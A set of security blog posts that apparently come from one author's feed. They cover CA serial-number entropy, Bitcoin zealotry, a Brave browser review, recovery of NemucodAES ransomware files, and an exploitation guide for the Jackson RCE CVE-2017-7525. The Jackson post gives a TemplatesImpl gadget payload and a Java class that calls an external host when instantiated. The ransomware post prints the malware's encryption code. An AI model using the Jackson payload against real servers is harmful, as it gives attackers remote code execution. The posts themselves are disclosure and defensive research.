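    # Option 2 (the problematic one): discard values with the high bit set
    # and try again -- the result always fits in 64 bits, but only 63 of
    # those bits are actually random.
    while True:
        value = secrets.randbits(64)
        if value < 2**63:  # high bit clear
            return value

# Option 2 halves the keyspace: 2**64 - 2**63 == 2**63
print(2**64 - 2**63)  # 9223372036854775808
```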

A popular software package for CAs, EJBCA, had a default of using 64-bit serial numbers, and used the second strategy for dealing with CSPRNG output with the high bit set. This means that instead of using the full 64-bit output, it effectively reduced it to 63 bits – cutting the number of possible values in half. When we are talking about numbers this large, it's easy to think that 1 bit wouldn't make much difference, but the difference between 2^64 and 2^63 is substantial – to be specific, they differ by 2^63 itself, or 9,223,372,036,854,775,808 (over 9 quintillion).

The strategy of calling the CSPRNG until you get a value that has the high bit unset violates the intention of the rule imposed by the Baseline Requirements, meaning that all certificates issued using this method were mis-issued. This is a big deal, at least for a few CAs and their customers.

Now, the simple solution to this is to just increase the length of the serial beyond 64 bits; for CAs that used 72 or more bits of CSPRNG output, this is a non-issue, as even if they coerce the high bit, they are still well above the 64-bit minimum. This is a clear case of following a standard as close to the minimum as possible, which left no margin for error. As the holders of those 2+ million certificates are learning, they cut it too close.

The Rule

The Baseline Requirements are the minimum rules2 that all CAs must follow; these rules are voted on by a group of browser makers and CAs, and often debated in detail. Thankfully for all involved, many of these discussions happen on public mailing lists, so it's easy to see what was discussed and what the views of the different parties were when a change was approved. This is a good thing when it comes to understanding this issue.

The relevant rule in this case is in section 7.1:

Effective September 30, 2016, CAs SHALL generate non-sequential Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.

On a prima facie reading of this requirement, it appears that the technique that EJBCA used could be valid – it is the output of a CSPRNG, and it is 64 bits. However, the Baseline Requirements can’t be read so simply, you have to look deeper to find the full intention. In this case, the fact that 1 bit would be lost in a purely random serial was pointed out by Ryan Sleevi of Google and Ben Wilson of DigiCert. This fact is not pointed out in the requirement itself, but is available to anyone that spends a few minutes looking at the history3 of the requirement.

With a deeper reading, it's clear that a 64-bit serial, the smallest permitted, is quite likely to be a violation of the Baseline Requirements. While you can't look at a single certificate to determine this, looking at a larger group will reveal if the certificate serial numbers are consistently 64 bits, in which case, there could be a problem.

Mass Revocation

When a certificate is issued that doesn't meet the Baseline Requirements, the issuing CA is required to take quick action. Once again, we look to the Baseline Requirements to find guidance:

The CA SHOULD revoke a certificate within 24 hours and MUST revoke a Certificate within 5 days if one or more of the following occurs: … 7. The CA is made aware that the Certificate was not issued in accordance with these Requirements or the CA’s Certificate Policy or Certification Practice Statement; …

This makes it clear that the CA has to revoke any certificate that wasn’t properly issued within 5 days. As a result, CAs are under pressure to address this issue as quickly as possible – replacing and revoking certificates with minimal delay to avoid missing this deadline. Google was able to revoke approximately 95% of their mis-issued certificates within the 5 days, Apple announced that they wouldn’t be able to complete the process within 5 days, and GoDaddy stated that they would need 30 days to complete the process. The same reason was cited by all three: minimizing impact. Without robust automation4, changing certificates can be complex and time-consuming, leaving the CA to choose between complying with requirements or impacting their customers.

Failing to comply with the Baseline Requirements will complicate audits, and could put a CA at risk of being removed from root stores.

The Impact

The full impact of this issue is far from known. For Google and Apple, both in the process of replacing their mis-issued certificates, the certificates were issued only to their own organizations – reducing the impact. On the other hand, GoDaddy, which has mis-issued more than 1.8 million certificates5, is facing a much larger problem, as these were certificates issued to customers – customers that are likely managing their certificates manually, and will require substantially longer to complete the process.

It’s also not clear how many other CAs may be impacted by this issue; while a few have come forward, I would be shocked if this is the full list. This is likely an issue that will live on for some time.

[Note on DarkMatter: This post is solely about the issue with serial numbers discovered as a result of the discussion around DarkMatter operating as a trusted CA in the Mozilla root store. It does not take any position on the issue of DarkMatter being deserving of such trust, which is left as an exercise for the reader.]

[Note on Exploitation Risk: Entropy in the serial number is required as a way to prevent hash collisions from being used to forge certificates; this requires an ability to predict or control certificate contents and the use of a flawed hashing algorithm, adding a random value makes this more difficult. This type of issue has been exploited with MD5, and could someday be exploited with SHA1; there’s no known flaws in the SHA2 family (used in all current end-entity certificates) that would allow such an attack. In addition, while due to this issue, the level of protection is reduced by half, 2^63 is still a large number and provides a substantial amount of safety margin.]

  1. There may be additional ways of handling this situation, though these are the most likely. Other methods may or may not actually be compliant with the Baseline Requirements. 
  2. Root store programs have their own rules which CAs must follow that go beyond the Baseline Requirements (BRs); as such, the BRs are not the final word in what is required, but a set of minimum requirements that all involved have agreed to. 
  3. Given the complex and sometimes adversarial nature of the CA/B Forum, even small and obvious changes are sometimes debated for extended periods. This makes updating the BRs more complex than it should be, and appears to drive changes to be as minimal as possible to avoid conflict. In an ideal world, CA/B Forum would produce an annotated version of the BRs that offer additional insight into the rules, their origins, and their intentions. In the world we live in, that would require a level of cooperation and coordination that is exceedingly unlikely. 
  4. With events like this, Heartbleed, and others that can lead to certificates being revoked with short notice, using robust automation to manage certificates is the only logical way forward. While this makes some people uncomfortable, manual management exposes organizations to far greater risk. 
  5. At the time of writing, these are preliminary numbers; the number of certificates that are being reissued is not clear. 


Adam Caudill <![CDATA[Bitcoin is a Cult]]> 2018-06-22T03:33:33Z 2018-06-22T03:33:33Z The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on,… Continue reading Bitcoin is a Cult

The post Bitcoin is a Cult appeared first on Adam Caudill.

The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.

Every year, their ranks grow, and their perception of cryptocurrencies becomes more grandiose, even as novel uses of the technology bring it to its knees. While I'm a firm believer that a well-designed cryptocurrency could ease the flow of money across borders, and provide a stable option in areas of mass inflation, the reality is that we aren't there yet. In fact, it's the substantial instability in value that allows speculators to make money. Those that preach that the US Dollar and Euro are on their deathbeds have utterly abandoned an objective view of reality.

A little background…

I read the Bitcoin white-paper the day it was released – an interesting use of Merkle trees to create a public ledger and a fairly reasonable consensus protocol – it got the attention of many in the cryptography sphere for its novel properties. In the years since that paper was released, Bitcoin has become rather valuable, attracted many that see it as an investment, and a loyal (and vocal) following of people who think it’ll change everything. This discussion is about the latter.

Yesterday, someone on Twitter posted the hash of a recent Bitcoin block, the thousands of Tweets and other conversations that followed have convinced me that Bitcoin has crossed the line into true cult territory.

It all started with this Tweet by Mark Wilcox:

The value posted is the hash of Bitcoin block #528249. The leading zeros are a result of the mining process; to mine a block you combine the contents of the block with a nonce (and other data) and hash it, and the hash has to have at least a certain number of leading zeros to be considered valid. If it doesn't, you change the nonce and try again, repeating until you produce a valid block. The part that people got excited about is what follows, 21e800.
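The mining loop described above can be sketched in a few lines. This is a toy illustration only; real Bitcoin mining double-SHA256es an 80-byte block header against a numeric target, not a hex-prefix check.

```python
# Toy sketch of the mining loop described above -- real Bitcoin hashes an
# 80-byte header with double SHA-256 against a numeric target.
import hashlib

def mine(block_data: bytes, leading_hex_zeros: int):
    prefix = "0" * leading_hex_zeros
    nonce = 0
    while True:
        digest = hashlib.sha256(block_data + nonce.to_bytes(8, "little")).hexdigest()
        if digest.startswith(prefix):
            return nonce, digest
        nonce += 1  # not enough leading zeros: change the nonce and try again

nonce, digest = mine(b"example block contents", 4)
print(nonce, digest)
```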

Some are claiming this is an intentional reference, that whoever mined this block actually went well beyond the current difficulty to not just bruteforce the leading zeros, but also the next 24 bits – which would require some serious computing power. If someone had the ability to bruteforce this, it could indicate something rather serious, such as a substantial breakthrough in computing or cryptography.

You must be asking yourself, what's so important about 21e800 – a question you would surely regret. Some are claiming it's a reference to E8 Theory (a widely criticized paper that presents a unified field theory), or to the 21,000,000 total Bitcoins that will eventually exist (despite the fact that 21 x 10^8 would be 2,100,000,000). There are others; they are just too crazy to write about. Another important fact is that a block with 21e8 following the leading zeros is mined on average about once a year – those were never seen as anything important.
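The "about once a year" figure checks out with simple arithmetic (my own back-of-the-envelope estimate):

```python
# Back-of-the-envelope check: the hex digits after the leading zeros are
# effectively uniform, so a specific 4-digit sequence like "21e8" appears
# with probability 1/16**4 per block.
blocks_per_year = 6 * 24 * 365   # ~one block every 10 minutes
p = 1 / 16**4                    # chance the next four hex digits are "21e8"
print(blocks_per_year * p)       # ~0.8 expected blocks per year
```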

This leads to where things get fun: the theories that are circulating about how this happened.

  • A quantum computer, that is somehow able to hash at unbelievable speed. This is despite the fact that there’s no indication in theories around quantum computers that they’ll be able to do this; hashing is one thing that’s considered safe from quantum computers.
  • Time travel. Yes, people are actually saying that someone came back from the future to mine this block. I think this is crazy enough that I don’t need to get into why this is wrong.
  • Satoshi Nakamoto is back. Despite the fact that there has been no activity with his private keys, some theorize that he has returned, and is somehow able to do things that nobody can. These theories don’t explain how he could do it.

If all this sounds like numerology to you, you aren’t alone.

All this discussion around special meaning in block hashes also reignited the discussion around something that is, at least somewhat, interesting. The Bitcoin genesis block, the first bitcoin block, does have an unusual property: the early Bitcoin blocks required that the first 32 bits of the hash be zero; however the genesis block had 43 leading zero bits. As the code that produced the genesis block was never released, it’s not known how it was produced, nor is it known what type of hardware was used to produce it. Satoshi had an academic background, so may have had access to more substantial computing power than was common at the time via a university. At this point, the oddities of the genesis block are a historical curiosity, nothing more.

A brief digression on hashing

This hullabaloo started with the hash of a Bitcoin block; so it’s important to understand just what a hash is, and understand one very important property they have. A hash is a one-way cryptographic function that creates a pseudo-random output based on the data that it’s given.

What this means, for the purposes of this discussion, is that for each input you get an effectively random output. Random numbers have a way of sometimes looking interesting, simply as a result of being random and the human brain's affinity for finding order in everything. When you start looking for order in random data, you find interesting things – that are nonetheless meaningless, as it's simply random. When people ascribe significant meaning to random data, it tells you far more about the mindset of those involved than about the data itself.
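A quick way to see this property: two inputs differing by a single character produce unrelated, random-looking digests, and any resemblance between them is pure chance.

```python
# Two inputs differing by one character give unrelated-looking digests.
import hashlib

a = hashlib.sha256(b"block 528249").hexdigest()
b = hashlib.sha256(b"block 528250").hexdigest()
print(a)
print(b)

# Count matching hex positions -- for two random 64-character hex strings,
# chance alone predicts about 4 matches (64 * 1/16).
matches = sum(x == y for x, y in zip(a, b))
print(matches)
```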

Cult of the Coin

First, let us define a couple of terms:

  • Cult: a system of religious veneration and devotion directed toward a particular figure or object.
  • Religion: a pursuit or interest to which someone ascribes supreme importance.

The Cult of the Coin has many saints, perhaps none greater than Satoshi Nakamoto, the pseudonym used by the person(s) that created Bitcoin. Vigorously defended, ascribed with ability and understanding far above that of a normal researcher, seen as a visionary beyond compare leading the world to a new economic order. When combined with Satoshi's secretive nature and unknown true identity, adherents of the Cult view Satoshi as a truly venerated figure.

That is, of course, with the exception of adherents that follow a different saint, who is unquestionably correct, and any criticism is seen as not only an attack on their saint, but on themselves as well. Those that follow EOS, for example, may see Satoshi as a hack that developed a failed project, yet will react fiercely to the slightest criticism of EOS, a reaction so strong that it's reserved only for an attack on one's deity. Those that follow IOTA react with equal fierceness; and there are many others.

These adherents have abandoned objectivity and reasonable discourse, and allowed their zealotry to cloud their vision. Any discussion of these projects and the people behind them that doesn’t include glowing praise inevitably ends with a level of vitriolic speech that is beyond reason for a discussion of technology.

This is dangerous, for many reasons:

  • Developers & researchers are blinded to flaws. Due to the vast quantities of praise by adherents, those involved develop a grandiose view of their own abilities, and begin to view criticism as unjustified attacks – as they couldn’t possibly have been wrong.
  • Real problems are attacked. Instead of technical issues being seen as problems to be solved and opportunities to improve, they are seen as attacks from people who must be motivated to destroy the project.
  • One coin to rule them all. Adherents are often aligned to one, and only one, saint. Acknowledging the qualities of another project means acceptance of flaws or deficiencies in their own, which they will not do.
  • Preventing real progress. Evolution is brutal, it requires death, it requires projects to fail and that the reasons for those failures to be acknowledged. If lessons from failure are ignored, if things that should die aren’t allowed to, progress stalls.

Discussions around many of the cryptocurrencies and related blockchain projects are becoming more and more toxic, making it impossible for well-intentioned people to have real technical discussions without being attacked. Discussions of real flaws, flaws that would doom a design in any other environment, are routinely treated as heretical without any analysis of their factual claims; as a result, the cost for the well-intentioned to get involved has become extremely high. There are at least some that are aware of significant security flaws that have opted to remain silent due to the highly toxic environment.

What was once driven by curiosity, a desire to learn and improve, to determine the viability of ideas, is now driven by blind greed, religious zealotry, self-righteousness, and self-aggrandizement.

I have precious little hope for the future of projects that inspire this type of zealotry, and its continued spread will likely harm real research in this area for many years to come. These are technical projects; some succeed, some fail – this is how technology evolves. Those designing these systems are human, just as flawed as the rest of us, and so too are the projects flawed. Some are well suited to certain use cases and not others, some aren't suited to any use case, none yet are suited to all. The discussions about these projects should be focused on the technical aspects, and done so to evolve this field of research; adding a religious element to these projects harms all.

[Note: There are many examples of this behavior that could be cited, however in the interest of protecting those that have been targeted for criticizing projects, I have opted to minimize such examples. I have seen too many people who I respect, too many that I consider friends, being viciously attacked – I have no desire to draw attention to those attacks, and risk restarting them.]


Adam Caudill <![CDATA[Exploiting the Jackson RCE: CVE-2017-7525]]> 2017-10-04T17:59:57Z 2017-10-04T17:59:57Z Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less… Continue reading Exploiting the Jackson RCE: CVE-2017-7525

The post Exploiting the Jackson RCE: CVE-2017-7525 appeared first on Adam Caudill.

Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it.

What To Look For

There are a couple of ways to use Jackson, the simplest, and likely most common, is to perform a binding to a single object, pulling the values from the JSON and setting the properties on the associated Java object. This is simple, straightforward, and likely not exploitable. Here’s a sample of what that type of document looks like:

  {
    "name" : "Bob",
    "age" : 13,
    "other" : {
      "type" : "student"
    }
  }
What we are interested in is a bit different – in some cases1 you can create arbitrary objects, and you will see their class name in the JSON document. If you see this, it should raise an immediate red flag. Here's an illustrative sample of what these look like (the class name will vary):

  {
    "obj" : [
      "com.example.SomeClass",
      { "name" : "Bob" }
    ]
  }
To determine if this really is Jackson that you are seeing, one technique is (if detailed error messages are available) to provide invalid input and look for references to Jackson's package names, such as:

  • com.fasterxml.jackson.databind
  • org.codehaus.jackson (older 1.x versions)

Building An Exploit

The ability to create arbitrary objects does come with some limitations, the most important of which is that Jackson requires a default constructor (no arguments), so some things that seem like obvious choices (i.e. java.lang.ProcessBuilder) aren't an option. There are some suggestions on techniques in the paper from Moritz Bechler; the technique pushed in the paper is interesting (the focus is on loading remote objects from another server), but it didn't meet my needs. There are other, simpler options available.

Helpfully, the project gave us a starting point to build an effective exploit in one of their unit tests:

{'id': 124,
 'obj': [ 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',
   {
     'transletBytecodes' : [ 'AAIAZQ==' ],
     'transletName' : 'a.b',
     'outputProperties' : { }
   }
 ]
}
This code leverages a well-known ‘gadget’ to create an object that will accept compiled Java code (via transletBytecodes) and execute it as soon as outputProperties is accessed. This creates a very simple, straightforward technique to exploit this vulnerability.

We can supply a payload to this to prove that we have execution, and we are done.

Building The Payload

In this case, the goal is to prove that we have execution, and the route I went is to have the server issue a GET request to Burp Collaborator. This can be done easily with the following sample code:


import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Exploit extends AbstractTranslet {
  public Exploit() throws Exception {
    // Runs when the object is instantiated: issue a GET to prove execution
    StringBuilder result = new StringBuilder();
    URL url = new URL("http://[your-url]");
    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
    String line;
    while ((line = rd.readLine()) != null) {
      result.append(line);
    }
    rd.close();
  }

  // Required abstract methods of AbstractTranslet; no-ops for our purposes
  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { }

  public void transform(DOM document, SerializationHandler[] handlers) { }
}
This code can be compiled with the javac compiler, and then the resulting .class file should be Base64 encoded, and provided to the transletBytecodes field in the JSON document. As soon as the document is processed, it will create the object, load the code, and execute it. You may still see errors from code failing after the code executes, such as from type-mismatches or the like.

Limiting Attack Surface

This is just one technique to exploit this flaw, there are many others available. To mitigate the issue, at least in part, Jackson has been modified with a blacklist of types known to be useful gadgets for this type of attack:

  • org.apache.commons.collections.functors.InvokerTransformer
  • org.apache.commons.collections.functors.InstantiateTransformer
  • org.apache.commons.collections4.functors.InvokerTransformer
  • org.apache.commons.collections4.functors.InstantiateTransformer
  • org.codehaus.groovy.runtime.ConvertedClosure
  • org.codehaus.groovy.runtime.MethodClosure
  • org.springframework.beans.factory.ObjectFactory
  • org.apache.xalan.xsltc.trax.TemplatesImpl
  • com.sun.rowset.JdbcRowSetImpl
  • java.util.logging.FileHandler
  • java.rmi.server.UnicastRemoteObject
  • org.springframework.beans.factory.config.PropertyPathFactoryBean
  • com.mchange.v2.c3p0.JndiRefForwardingDataSource
  • com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

There are likely others that can be used in similar ways to gain code execution that haven’t become well-known yet, so this doesn’t eliminate the problem, it just makes it less likely.

Required Reading & References

To fully understand this vulnerability, there are a few things that you should read, starting with the paper from Moritz Bechler mentioned above.

  1. To exploit this issue, the user of the library must have enabled Default Typing (mapper.enableDefaultTyping), if this hasn’t been done, then the exploit here doesn’t work, as you aren’t able to create arbitrary objects. 


Adam Caudill <![CDATA[Breaking the NemucodAES Ransomware]]> 2017-07-13T01:47:08Z 2017-07-13T01:23:13Z The Nemucod ransomware has been around, in various incarnations, for some time. Recently a new variant started spreading via email claiming to be from UPS. This new version changed how files are encrypted, clearly in an attempt to fix its prior issue of being able to decrypt files without paying the ransom, and as this… Continue reading Breaking the NemucodAES Ransomware

The post Breaking the NemucodAES Ransomware appeared first on Adam Caudill.

The Nemucod ransomware has been around, in various incarnations, for some time. Recently a new variant started spreading via email claiming to be from UPS. This new version changed how files are encrypted, clearly in an attempt to fix a prior flaw that allowed files to be decrypted without paying the ransom, and as this is a new version, no decryptor was available1. My friends at Savage Security contacted me to help save the data of one of their clients; I immediately began studying the cryptography-related portions of the software, while the Savage Security team was busy looking at other portions.

The Code

The code that really matters is in a PHP file2, named after the Bitcoin address that the victim is to pay the ransom to, and stored under the user’s %TEMP% directory. Here’s the bit that matters to us:

if ($stat_files > 0) {
    $db = fopen($fn . ".db", "w");
    foreach ($_SERVER["files"] as $file) {
        $fp = fopen($file, "r+");
        if ($fp === false) continue;
        $trash = "";
        for ($i = 0; $i < 2048; $i++) $trash .= chr(mt_rand(0, 255));
        $key = "";
        for ($i = 0; $i < 128; $i++) $key .= chr(mt_rand(0, 255));
        $aes = new Crypt_AES(CRYPT_AES_MODE_ECB);
        $b = fread($fp, 2048);
        fseek($fp, 0);
        fwrite($fp, substr($trash, 0, strlen($b)));
        $b = $aes->encrypt($b);
        $rsa = new Crypt_RSA();
        $key = $rsa->encrypt($key);
        fputs($db, $file . "    " . base64_encode($key) . " " . base64_encode($b) . "\n");
        // ... (remainder of the snippet trimmed)
    }
}

There are some important things that we see immediately:

  • They generate a unique encryption key for each file.
  • They are using AES-128 in ECB mode.
  • They are using RSA to encrypt the AES-128 key and store it in a .db file (also named after the Bitcoin address).
  • They encrypt the first 2,048 bytes of the file, and then replace it with random data.
  • The .db file contains the path, encrypted AES-128 key, and the encrypted data removed from the file.
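Based on the fputs call shown above, each line of the .db file can be pulled apart with a short sketch like this (the format is inferred from the PHP; the function and field names are my own):

```python
import base64

def parse_db_line(line):
    # Inferred from the ransomware's fputs call:
    # <path><4 spaces><base64(RSA-encrypted AES key)><space><base64(stolen bytes)>
    path, rest = line.rstrip("\n").split("    ", 1)
    b64_key, b64_data = rest.split(" ", 1)
    return {
        "path": path,
        "encrypted_key": base64.b64decode(b64_key),
        "stolen_bytes": base64.b64decode(b64_data),
    }
```

Having the stolen first 2,048 bytes stored alongside the encrypted key is what makes full recovery possible once the key is known.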

The Critical Mistake(s)

If you’ve been to any of my talks on cryptography, you should see an immediate issue with this code. If not, let me point this line out:

for ($i = 0;$i < 128;$i++) $key.= chr(mt_rand(0, 255));

This line creates a 128-byte key to be used to encrypt the file (it seems the developers don’t know bits from bytes – AES-128 uses a 16-byte key), using PHP’s mt_rand function. This function generates random numbers using the Mersenne Twister algorithm, which happens to use a small (32-bit) seed – this is where the fun begins.

Because of this small seed, if we can observe the initial output of mt_rand, we can brute-force the seed and then predict its future output. Thankfully, the developers of Nemucod made this easy for us. If you recall, the first 2,048 bytes of each file are replaced with random data from mt_rand, then the encryption key is generated immediately after. This means that they have given us everything we need.

Using the first few bytes (4 or 5), we can brute-force the seed that mt_rand used3, and by running mt_rand the appropriate number of times, we can create the exact output that the PHP script did when it encrypted the files, revealing the file encryption keys and allowing us to decrypt all of the files.

Cracking the Seed

To get the seed, we need to brute-force all 2^32 possible values – thankfully, there’s a handy tool to do this quickly. A few years ago, the always impressive Solar Designer released just what we need: php_mt_seed. This is a simple command-line tool that takes observed output (in this case, the first few bytes of the first file encrypted) and finds the seed that was used.

./php_mt_seed 98 98 0 255  251 251 0 255 47 47 0 255  131 131 0 255
Found 0, trying 1241513984 - 1275068415, speed 39053601 seeds per second 
seed = 1241912029
Found 1, trying 4261412864 - 4294967295, speed 45989778 seeds per second 
Found 1

Using php_mt_seed, it takes only about a minute to test all of the possible seeds, and identify the correct one. Once we have that, decryption is simple, and we have all of the data back without paying a single cent to the extortionists.
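The attack can be illustrated in Python, whose random module also uses the Mersenne Twister. Python seeds and tempers the generator differently from PHP’s mt_rand, so this is a scaled-down sketch of the principle (with a deliberately small seed space), not a drop-in replacement for php_mt_seed:

```python
import random

def infected_output(seed, n_trash=8, n_key=16):
    # Mimic the ransomware's pattern: "trash" bytes are drawn first,
    # then the key bytes, all from one seeded Mersenne Twister stream.
    rng = random.Random(seed)
    trash = [rng.randint(0, 255) for _ in range(n_trash)]
    key = [rng.randint(0, 255) for _ in range(n_key)]
    return trash, key

def recover_key(observed_trash, seed_space, n_key=16):
    # Brute-force candidate seeds until one reproduces the observed trash,
    # then run the same stream forward to predict the key bytes.
    for seed in seed_space:
        rng = random.Random(seed)
        if all(rng.randint(0, 255) == b for b in observed_trash):
            return seed, [rng.randint(0, 255) for _ in range(n_key)]
    return None, None

trash, real_key = infected_output(seed=48271)
found, predicted = recover_key(trash, range(100_000))
assert found == 48271 and predicted == real_key
```

The real attack is the same loop run over all 2^32 seeds, which is exactly what php_mt_seed does – just heavily optimized.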

Why Randomness Matters

When it comes to key generation (and many other aspects of cryptography), the use of a secure random number generator is critical. If you look at the documentation for mt_rand, you’ll see this very clear warning:

This function does not generate cryptographically secure values, and should not be used for cryptographic purposes. If you need a cryptographically secure value, consider using random_int(), random_bytes(), or openssl_random_pseudo_bytes() instead.

Had the developers heeded this warning and used a more appropriate method for generating the file encryption keys, this method would not have worked. Had the developers not been so kind as to provide us with output from mt_rand in the files, this would not have worked. It is the developers of Nemucod who made recovering the data trivial, due to their lack of understanding of proper secure techniques4. While I don’t want to aid ransomware authors, this is a well-known aspect of cryptography – if you write crypto code without a full understanding of what you are doing, and of what you are using, this is what happens.
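The fix is a one-line change of primitive. The PHP documentation points to random_bytes(); the equivalent in Python terms is the secrets module, which draws from the operating system’s CSPRNG:

```python
import secrets

def generate_aes128_key() -> bytes:
    # 16 bytes = 128 bits, drawn from the OS CSPRNG. Unlike the
    # Mersenne Twister, this output cannot be recreated by guessing a seed.
    return secrets.token_bytes(16)

key = generate_aes128_key()
assert len(key) == 16
```

With a key generated this way, observing the "trash" bytes would have told an analyst nothing about the key.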

  1. In the hours before this post was published, Emsisoft released a decryption tool for those hit by this version of Nemucod. 
  2. This ransomware targets Windows users, though the core is written in PHP. The downloader, written in JavaScript, downloads the Windows version of PHP (version 5.6.3) and uses that to execute the PHP file. Yes, this is as crazy as it sounds. 
  3. If mt_rand is not seeded explicitly via mt_srand, PHP will select a random seed, and seed it automatically. In this case, the developers did not explicitly select a seed. 
  4. There may be additional methods here that could be used, but those are beyond the scope of this article. 


Adam Caudill <![CDATA[30 Days of Brave]]> 2017-05-02T22:38:25Z 2017-05-02T22:38:25Z Brave is a web browser available for multiple platforms that aims to provide additional security and privacy features – plus a novel monetization scheme for publishers. I gave it 30 days to see if it was worth using. I switched on all platforms I use to give it a fair shot, I normally use Chrome… Continue reading 30 Days of Brave

The post 30 Days of Brave appeared first on Adam Caudill.


Brave is a web browser available for multiple platforms that aims to provide additional security and privacy features – plus a novel monetization scheme for publishers. I gave it 30 days to see if it was worth using. I switched on all platforms I use to give it a fair shot, I normally use Chrome which made the switch less painful, though the results were very much mixed. There are some things I honestly liked about it, some things I really disliked, and at least one thing that just made me mad.

The Good

There are some truly good things about Brave, here are a few that are important to me.

Based on Blink (Chromium)

Brave is built on the Blink engine, the same engine that powers Chromium & Chrome – this gives Brave some of the better security properties of Chrome, and Brave actually uses the Chrome user-agent to pretend to be Chrome. This means that Brave has similar performance and rendering quality to the other Blink browsers, which gives it an edge over Firefox and keeps it on par with Chrome.

The use of Blink is key to making the switch reasonable: there are no issues with sites breaking, as is so common when switching from one browser to another.

HTTPS Everywhere

Brave integrates HTTPS Everywhere to force connections to use TLS when possible. This is great, though the same can be achieved by using the HTTPS Everywhere plugin. During my time using Brave, it reported having performed over 15,000 TLS upgrades – just on my personal laptop.

Ad Blocking & Payments

Brave takes an interesting view of ads, it includes ad blocking, but also includes Brave Payments (disabled by default), which allows you to give something to the sites you visit most often. I put $5 into it, and let it run for a month – it tracks how much time you spend on each site, and splits up the money between them.

Of all the sites that Brave lists in my top sites, only two are set up to actually receive the payments – one of them being this site (which I set up during the testing process). A number of the sites included really make little sense – they aren’t content sites at all, yet they each got a share of the money. You can selectively disable certain sites from being included, but that requires watching the list and making sure that it’s maintained. You don’t have the opportunity to confirm who gets paid before the payment takes place, so make sure you check the list often.

When a payment is made, the money (Bitcoin actually), is transferred to accounts that Brave Software controls, and when (if) a site receives $100 in payments, one of two things happens:

  • If the site has already been setup for payments, the money is transferred to the site’s Bitcoin wallet.
  • If the site isn’t setup, they will attempt to contact them to set up the site so they can receive their money, if they don’t after a period of time, the money is distributed to other sites that are properly setup.

It’s an interesting setup, and somewhat cool to be honest – though it does leave a decent amount of money in the control of Brave Software. Will this site ever get $100 in revenue from Brave users? I’m not holding my breath. That means the money will stay in the control of Brave Software essentially forever.

The ad blocking itself works well, roughly the same you would get from uBlock Origin.


It’s hard to quantify just how much time is actually saved by using Brave; it’s not just general performance, but the integrated ad blocking that saves bandwidth and processing time. It claims to have saved me 18 minutes on my laptop and 5 minutes on my iPhone.

It does feel a bit faster, but the placebo effect may explain it.

The Bad

There are some things about Brave that just didn’t live up to my expectations, some of these are from a lack of polish – things that will likely be fixed as time goes on, others were more fundamental.

Private Browsing

Like pretty much every major browser today, Brave offers a private browsing feature, but it’s implemented in a way that I find troubling. Typically, when you use Private Browsing, a new window is created, and everything in that window is held to a private scope. In Brave, a tab is private – so the scopes are mixed, and it’s easy to cross that boundary. When you right-click a link in a private tab, you can open the link in a new private tab or in a new normal tab. This makes it extremely easy to cross the line and expose activity that was meant to be isolated.

I often use this feature to separate session scopes – logging into a site in a normal window, and a different account (or no account) in a private window. This design makes it trivial to take an action under the wrong account. I think they were trying to make things easier, but what they did was make it easy to make mistakes.

Memory Leaks

Brave is leaky – like Titanic kind of leaky. I once left a Twitter tab open over a weekend; when I came back on Monday, Brave had consumed every available byte of RAM. So much so that even killing the process turned out to be impossible, and I had to perform a hard reboot. Chrome is known for its high RAM usage, though Brave has pushed it too far.

PDF Handling

Built-in PDF handling is essentially a must these days, and Brave tries here – but ultimately fails. The integrated PDF viewer works well in most cases, but when a PDF is behind a login, it fails, and the feature has to be disabled to download the file at all. Changing this setting requires restarting the application, so I eventually just left it off.

Rough Edges

Brave is a perfect setup for death by a thousand cuts: from oddness with tab management and painful auto-complete in the search / address bar, to the inability to search for anything containing a period (Brave treats it as a URL), and many others. Much of this will improve as Brave matures, though for now the rough edges are a constant annoyance that makes me want to switch back to Chrome. Some I’ve learned to work around; others are still painful every time I run into them.

The Mad

Brave recently published a highly misleading article that painted a very negative view of the standard QUIC protocol, trying to accuse Google of using QUIC as a way to circumvent ad blocking. The article was built on, at best, a significant misunderstanding on the part of Brave. The article was later updated, though the update was entirely insufficient to set the record straight, leaving users with a misunderstanding of the technology and how it applies to Chrome and other browsers.

Whether purely from a lack of understanding, or something else, the issue was poorly handled – they attacked a competitor (one which makes their product possible) without understanding the details they were talking about, misled users of Chrome and Brave, and failed to accurately update their article to undo their misstatements. There are some people at Brave Software that I greatly respect, so this was shocking for me, and I lost a great deal of respect for the organization as a result.


Brave is an interesting experiment in how a browser can address privacy concerns, and provide an avenue for monetization; I hope that others in the market look at it and learn from what they do right. The application for iOS feels a lot more polished than the desktop version, and while I’m going to switch back to Chrome as my primary browser, I may keep the iOS version handy.


